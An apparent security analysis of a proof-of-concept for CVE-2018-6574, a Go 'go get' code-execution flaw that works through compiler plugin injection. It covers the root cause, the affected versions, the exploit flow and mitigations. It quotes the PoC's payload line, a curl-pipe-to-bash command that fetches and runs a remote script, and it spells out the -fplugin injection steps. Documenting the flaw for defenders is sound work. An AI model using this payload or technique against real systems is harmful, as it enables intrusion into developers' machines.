Deep Dive: CVE-2018-6574 – Go go get
RCE via Compiler Plugin Injection
This analysis examines the frozenkp/CVE-2018-6574
PoC repository, which demonstrates a remote code execution (RCE) vulnerability in certain Go toolchains via the go get
command exploiting untrusted compiler plugins.
Background & Impact
- Root cause: Older Go versions allowed passing compiler flags like
-fplugin=
(for gcc/clang plugins) via go get
, without sanitization. This enabled attackers to inject a malicious shared library into the build process.
- Severity: High (CVSS 7.8)
- Affected versions:
- Go < 1.8.7
- Go 1.9.x < 1.9.4
- Go 1.10 pre-release < 1.10rc2
- Exploit vector: Execution of arbitrary commands during
go get
, while building C-enabled Go packages.
Repository Contents
README.md
Explains that by hosting this PoC repo and running:
go get github.com/frozenkp/CVE-2018-6574
a malicious .so
will be compiled and loaded, executing attacker-specified commands.
calc_darwin.so
A compiled shared library targeting macOS. It executed:
curl newton.cycarrier:8002 | /bin/bash
to fetch and run a remote script.
main.go
Minimal code invoking C bridging:
r := C.bridge_int_func(C.fortytwo)
fmt.Println(r)
This ensures the shared .so
is linked and executed.
Exploitation Flow
- Host PoC repo containing malicious C plugin or drop-in
.so
binary.
- Victim runs vulnerable Go version and executes:
go get github.com/frozenkp/CVE-2018-6574
- Compiler uses
-fplugin=./calc_darwin.so
, loading the attacker’s plugin during build.
- Plugin executes payload (e.g.,
curl … | bash
) for initial access.
- The Go app is compiled and installed, with RCE running transparently.
Mitigation & Resolution
- Fixed in Go 1.8.7, 1.9.4, 1.10rc2 and newer:
Sanitization blocked -fplugin=
and similar flags.
- To users:
- Upgrade Go to at least 1.8.7, 1.9.4, or any 1.10+ release.
- Avoid building untrusted code with C/C++ toolchain enabled.
- To developers:
- Audit usage of Cgo in dependencies.
- Apply CI checks to detect unexpected
-fplugin
flags during builds.
Timeline Highlights
- February 7, 2018: NVD entry for CVE-2018-6574.
- 2022–2023: Added to GitHub Advisory Database (May 2022; updated February 2023).
Conclusion
This PoC cleverly abuses Go’s Cgo/go get
pipeline to inject compiler plugins and execute arbitrary code at build time. Though the CVE is resolved in modern Go releases, any environment using legacy Go versions (<1.8.7, <1.9.4, pre-1.10rc2) remains at risk if untrusted repositories are built. Developers should upgrade their toolchains and audit third-party code for unsafe build flags.